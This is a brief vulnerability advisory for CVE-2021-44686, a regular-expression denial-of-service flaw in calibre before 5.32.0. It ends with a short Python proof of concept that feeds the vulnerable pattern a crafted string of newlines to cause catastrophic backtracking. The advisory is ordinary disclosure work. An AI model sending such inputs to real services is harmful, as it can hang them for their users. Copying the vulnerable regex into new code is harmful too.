CVE-2021-44686: Regular Expression Denial-of-Service (ReDoS) in calibre

- 1 min


calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Proof of Concept

Vulnerable code: /src/calibre/ebooks/conversion/

To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below.

import re

reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
reg.match('<head>' + '\n' * 1337)